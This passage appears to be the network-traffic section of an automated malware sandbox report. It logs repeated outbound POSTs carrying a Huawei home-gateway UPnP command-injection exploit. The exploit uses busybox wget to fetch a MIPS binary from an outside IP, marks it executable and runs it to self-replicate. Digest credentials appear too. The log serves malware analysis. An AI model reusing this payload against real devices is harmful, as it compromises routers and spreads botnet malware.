                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          153192.168.2.234904041.137.214.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135976076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          154192.168.2.2340392197.69.192.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135978937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          155192.168.2.234641841.239.93.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135982990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          156192.168.2.2347174167.126.51.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135983944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          157192.168.2.2342674157.238.170.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136029959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          158192.168.2.2350840165.249.12.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136044025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          159192.168.2.234607641.231.181.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136044025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          160192.168.2.2345772157.94.0.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136068106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          161192.168.2.2344952157.63.239.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136796951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          162192.168.2.2354796157.179.251.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.136797905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
